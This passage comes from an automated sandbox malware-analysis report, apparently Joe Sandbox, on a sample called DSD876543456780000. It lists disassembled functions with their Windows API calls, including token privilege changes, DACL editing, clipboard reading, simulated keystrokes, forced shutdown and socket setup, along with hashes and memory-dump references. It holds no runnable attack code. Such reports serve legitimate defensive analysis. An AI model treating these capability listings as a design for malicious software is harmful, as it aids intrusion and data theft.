                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: d4f29e1771db7f07cb3ac76afdd64afb051dbe9c9653fb9c9de0e4e11472ae7b
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: 42310674A00209DBD728CF59D491969F7A2FF49300F2486A9E819CFA95D731EEC2CBC0
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 00B622F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                        • Instruction ID: 80b1a08b7a675d39aefefe4bb0f0bf244d8e0a8a12e1d39408ecc7301ffa72da
                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                        • Instruction Fuzzy Hash: 51E0BF7494010DEFDB00EFA4D6496DE7BB4EF04301F1005A1FD05D7680DB309E548A76
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 00B622F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: e4539b6c488f834ec9a7d0fa6fa8d241c3db76cc984f410d52386351ec7fae8e
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: 45E0BF7494010D9FDB00EFA4D64969E7BB4EF04301F1005A1FD0192280D63099508A72
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C8961A
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8965B
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C8969F
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C896C9
                                        • SendMessageW.USER32 ref: 00C896F2
                                        • GetKeyState.USER32(00000011), ref: 00C8978B
                                        • GetKeyState.USER32(00000009), ref: 00C89798
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C897AE
                                        • GetKeyState.USER32(00000010), ref: 00C897B8
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C897E9
                                        • SendMessageW.USER32 ref: 00C89810
                                        • SendMessageW.USER32(?,00001030,?,00C87E95), ref: 00C89918
                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C8992E
                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C89941
                                        • SetCapture.USER32(?), ref: 00C8994A
                                        • ClientToScreen.USER32(?,?), ref: 00C899AF
                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C899BC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C899D6
                                        • ReleaseCapture.USER32 ref: 00C899E1
                                        • GetCursorPos.USER32(?), ref: 00C89A19
                                        • ScreenToClient.USER32(?,?), ref: 00C89A26
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C89A80
                                        • SendMessageW.USER32 ref: 00C89AAE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C89AEB
                                        • SendMessageW.USER32 ref: 00C89B1A
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C89B3B
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C89B4A
                                        • GetCursorPos.USER32(?), ref: 00C89B68
                                        • ScreenToClient.USER32(?,?), ref: 00C89B75
                                        • GetParent.USER32(?), ref: 00C89B93
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C89BFA
                                        • SendMessageW.USER32 ref: 00C89C2B
                                        • ClientToScreen.USER32(?,?), ref: 00C89C84
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C89CB4
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C89CDE
                                        • SendMessageW.USER32 ref: 00C89D01
                                        • ClientToScreen.USER32(?,?), ref: 00C89D4E
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C89D82
                                          • Part of subcall function 00C09944: GetWindowLongW.USER32(?,000000EB), ref: 00C09952
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C89E05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 3429851547-4164748364
                                        • Opcode ID: ba48266aad0e2536eea387be2dfb767b255330d5d09a5facfc204e15d139a166
                                        • Instruction ID: 7e6a7fa465658e610ecd27201908381db82deeb8d667b454a600ef250d29df24
                                        • Opcode Fuzzy Hash: ba48266aad0e2536eea387be2dfb767b255330d5d09a5facfc204e15d139a166
                                        • Instruction Fuzzy Hash: A1427C70204601AFDB24EF24CC84FBABBF5FF49318F180619F669872A1E731A954DB59
                                        APIs
                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C848F3
                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C84908
                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C84927
                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C8494B
                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C8495C
                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C8497B
                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C849AE
                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C849D4
                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C84A0F
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C84A56
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C84A7E
                                        • IsMenu.USER32(?), ref: 00C84A97
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C84AF2
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C84B20
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C84B94
                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C84BE3
                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C84C82
                                        • wsprintfW.USER32 ref: 00C84CAE
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C84CC9
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C84CF1
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C84D13
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C84D33
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C84D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 4054740463-328681919
                                        • Opcode ID: a414eceec2966265ad263bbb2eb01fb0198388c478f6b1f31fda60dd3c4b6c4e
                                        • Instruction ID: 29b8b2b721b80bf6b32a8aa018cbd903ce5b5ef531b7e2260b19c009cb749047
                                        • Opcode Fuzzy Hash: a414eceec2966265ad263bbb2eb01fb0198388c478f6b1f31fda60dd3c4b6c4e
                                        • Instruction Fuzzy Hash: 10122331600256ABEB28AF64CC49FAE7BF8EF45318F10412DF525DB2E1DB749A41CB58
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C0F998
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4F474
                                        • IsIconic.USER32(00000000), ref: 00C4F47D
                                        • ShowWindow.USER32(00000000,00000009), ref: 00C4F48A
                                        • SetForegroundWindow.USER32(00000000), ref: 00C4F494
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4F4AA
                                        • GetCurrentThreadId.KERNEL32 ref: 00C4F4B1
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4F4BD
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4F4CE
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4F4D6
                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C4F4DE
                                        • SetForegroundWindow.USER32(00000000), ref: 00C4F4E1
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F4F6
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F501
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F50B
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F510
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F519
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F51E
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4F528
                                        • keybd_event.USER32(00000012,00000000), ref: 00C4F52D
                                        • SetForegroundWindow.USER32(00000000), ref: 00C4F530
                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C4F557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: f4e60b18718f68c8cc10840eec8dbcb3146e4dcaf763ab960c8cda105ddd1e0b
                                        • Instruction ID: cf82da5bb30aaeb59ace782de957f145afe7e6dad6311b81a53beec6ef4f2557
                                        • Opcode Fuzzy Hash: f4e60b18718f68c8cc10840eec8dbcb3146e4dcaf763ab960c8cda105ddd1e0b
                                        • Instruction Fuzzy Hash: 67315471A40218BBEB206BB59C8AFBF7E6CFB44B50F100069F605E61D1D6B15D01AB74
                                        APIs
                                          • Part of subcall function 00C516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5170D
                                          • Part of subcall function 00C516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5173A
                                          • Part of subcall function 00C516C3: GetLastError.KERNEL32 ref: 00C5174A
                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C51286
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C512A8
                                        • CloseHandle.KERNEL32(?), ref: 00C512B9
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C512D1
                                        • GetProcessWindowStation.USER32 ref: 00C512EA
                                        • SetProcessWindowStation.USER32(00000000), ref: 00C512F4
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C51310
                                          • Part of subcall function 00C510BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C511FC), ref: 00C510D4
                                          • Part of subcall function 00C510BF: CloseHandle.KERNEL32(?,?,00C511FC), ref: 00C510E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                        • String ID: $default$winsta0
                                        • API String ID: 22674027-1027155976
                                        • Opcode ID: 113ba7e471ea6389ca8cdfb3373de14a86199ff86b6cd75318721141ae22a957
                                        • Instruction ID: 3403e6706a2317f356289a8b8abcbf70fe61db18aee30ad78a3fa24f7fa295f7
                                        • Opcode Fuzzy Hash: 113ba7e471ea6389ca8cdfb3373de14a86199ff86b6cd75318721141ae22a957
                                        • Instruction Fuzzy Hash: 0781A275900209AFDF119FA4DC89FEE7BB9EF04705F184129FD20B61A0D7748A89DB28
                                        APIs
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51114
                                          • Part of subcall function 00C510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51120
                                          • Part of subcall function 00C510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C5112F
                                          • Part of subcall function 00C510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C50B9B,?,?,?), ref: 00C51136
                                          • Part of subcall function 00C510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C5114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C50BCC
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C50C00
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50C17
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C50C51
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C50C6D
                                        • GetLengthSid.ADVAPI32(?), ref: 00C50C84
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C50C8C
                                        • HeapAlloc.KERNEL32(00000000), ref: 00C50C93
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C50CB4
                                        • CopySid.ADVAPI32(00000000), ref: 00C50CBB
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C50CEA
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C50D0C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C50D1E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50D45
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D4C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50D55
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D5C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C50D65
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D6C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C50D78
                                        • HeapFree.KERNEL32(00000000), ref: 00C50D7F
                                          • Part of subcall function 00C51193: GetProcessHeap.KERNEL32(00000008,00C50BB1,?,00000000,?,00C50BB1,?), ref: 00C511A1
                                          • Part of subcall function 00C51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C50BB1,?), ref: 00C511A8
                                          • Part of subcall function 00C51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C50BB1,?), ref: 00C511B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: d695f8f8ea0eb2bd5ac90a9de56dbf67af96f14a7d12969a9a0a4d584316c74f
                                        • Instruction ID: 18e0b04f58e6e1ee2bd3b207532f410f0d0c4f69994443d2de9c90ddea0e87fc
                                        • Opcode Fuzzy Hash: d695f8f8ea0eb2bd5ac90a9de56dbf67af96f14a7d12969a9a0a4d584316c74f
                                        • Instruction Fuzzy Hash: 96716C7590020AABDF109FE4DC88FEEBBB8BF05341F244519ED24E6191D771AA49CB74
                                        APIs
                                        • OpenClipboard.USER32(00C8CC08), ref: 00C6EB29
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C6EB37
                                        • GetClipboardData.USER32(0000000D), ref: 00C6EB43
                                        • CloseClipboard.USER32 ref: 00C6EB4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00C6EB87
                                        • CloseClipboard.USER32 ref: 00C6EB91
                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C6EBBC
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00C6EBC9
                                        • GetClipboardData.USER32(00000001), ref: 00C6EBD1
                                        • GlobalLock.KERNEL32(00000000), ref: 00C6EBE2
                                        • GlobalUnlock.KERNEL32(00000000,?), ref: 00C6EC22
                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C6EC38
                                        • GetClipboardData.USER32(0000000F), ref: 00C6EC44
                                        • GlobalLock.KERNEL32(00000000), ref: 00C6EC55
                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C6EC77
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6EC94
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6ECD2
                                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00C6ECF3
                                        • CountClipboardFormats.USER32 ref: 00C6ED14
                                        • CloseClipboard.USER32 ref: 00C6ED59
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                        • String ID:
                                        • API String ID: 420908878-0
                                        • Opcode ID: a25a8986d2aaf813922dfce921096d4633c78127748f97e595909eb797c660fb
                                        • Instruction ID: 8817a4b8e01bde32e034465d6d3b2bbe7eda8b222e9ae3a039d248cf26abf035
                                        • Opcode Fuzzy Hash: a25a8986d2aaf813922dfce921096d4633c78127748f97e595909eb797c660fb
                                        • Instruction Fuzzy Hash: FD61DF38204205AFD320EF24D8C5F3A77E4AF84754F18456AF556972A2DB31DA09CB66
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C669BE
                                        • FindClose.KERNEL32(00000000), ref: 00C66A12
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C66A4E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C66A75
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C66AB2
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C66ADF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                        • API String ID: 3830820486-3289030164
                                        • Opcode ID: 5c6457b077596457bd8a6b46b0d86e5506e4b178c8f84454053711a0145aa170
                                        • Instruction ID: 12c4b94c39d4e3980ba13aa51cf6454cf8066f2669858241350b7fe1329f8a1a
                                        • Opcode Fuzzy Hash: 5c6457b077596457bd8a6b46b0d86e5506e4b178c8f84454053711a0145aa170
                                        • Instruction Fuzzy Hash: 40D15E72508304AFC710EBA4C991EBBB7ECAF88704F04495DF689C7191EB74DA48CB62
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C69663
                                        • GetFileAttributesW.KERNEL32(?), ref: 00C696A1
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00C696BB
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C696D3
                                        • FindClose.KERNEL32(00000000), ref: 00C696DE
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C696FA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6974A
                                        • SetCurrentDirectoryW.KERNEL32(00CB6B7C), ref: 00C69768
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C69772
                                        • FindClose.KERNEL32(00000000), ref: 00C6977F
                                        • FindClose.KERNEL32(00000000), ref: 00C6978F
                                        Strings
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C697BE
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C69819
                                        • FindClose.KERNEL32(00000000), ref: 00C69824
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C69840
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C69890
                                        • SetCurrentDirectoryW.KERNEL32(00CB6B7C), ref: 00C698AE
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C698B8
                                        • FindClose.KERNEL32(00000000), ref: 00C698C5
                                        • FindClose.KERNEL32(00000000), ref: 00C698D5
                                          • Part of subcall function 00C5DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C5DB00
                                        Strings
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00C68257
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C68267
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C68273
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C68310
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68324
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68356
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C6838C
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68395
                                        Strings
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        APIs
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                          • Part of subcall function 00C5E199: GetFileAttributesW.KERNEL32(?,00C5CF95), ref: 00C5E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C5D122
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C5D1DD
                                        • MoveFileW.KERNEL32(?,?), ref: 00C5D1F0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5D20D
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5D237
                                          • Part of subcall function 00C5D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C5D21C,?,?), ref: 00C5D2B2
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 00C5D253
                                        • FindClose.KERNEL32(00000000), ref: 00C5D264
                                        Strings
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        APIs
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        APIs
                                          • Part of subcall function 00C516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5170D
                                          • Part of subcall function 00C516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5173A
                                          • Part of subcall function 00C516C3: GetLastError.KERNEL32 ref: 00C5174A
                                        • ExitWindowsEx.USER32(?,00000000), ref: 00C5E932
                                        Strings
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $ $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-3163812486
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C71276
                                        • WSAGetLastError.WSOCK32 ref: 00C71283
                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C712BA
